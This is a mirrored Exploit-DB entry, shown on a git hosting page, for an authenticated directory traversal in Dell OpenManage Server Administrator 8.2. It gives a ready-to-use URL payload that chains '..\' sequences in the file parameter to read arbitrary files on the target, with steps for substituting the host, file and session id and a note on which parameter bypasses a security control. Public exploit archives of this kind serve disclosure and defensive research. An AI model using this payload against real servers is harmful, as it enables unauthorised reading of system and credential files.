bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/webapps/39486.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

27 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated
Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link:
http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64
When authenticated as an admin, make the following adjustments to the URL
below:
1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.
https://
<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF
In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.
The path parameter should not be changed; the provided value is essential
to bypassing a security control.
Reference in a new issue View git blame Copy permalink